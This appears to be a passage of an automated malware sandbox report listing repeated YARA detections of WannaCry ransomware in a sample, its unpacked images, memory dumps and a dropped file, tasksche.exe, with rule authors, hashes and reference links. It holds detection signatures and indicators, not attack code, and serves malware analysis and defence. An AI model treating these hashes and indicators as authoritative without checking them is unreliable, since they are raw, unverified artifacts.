          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 00000002.00000000.309616017.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 00000001.00000000.305783465.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 00000001.00000002.577194979.0000000002508000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 00000001.00000002.576443116.0000000001FD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 00000000.00000000.302374348.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 00000001.00000002.575749236.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 00000000.00000002.311470610.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: Ee3RWj3ID9.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Ee3RWj3ID9.exe, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: Ee3RWj3ID9.exe, type: SAMPLEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: Ee3RWj3ID9.exe, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: Ee3RWj3ID9.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.24f98c8.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.24f98c8.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.24f98c8.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 1.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 0.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 0.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
          Source: 1.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.1fd20a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.1fd20a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.Ee3RWj3ID9.exe.25048e8.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.25048e8.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000002.00000000.309616017.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
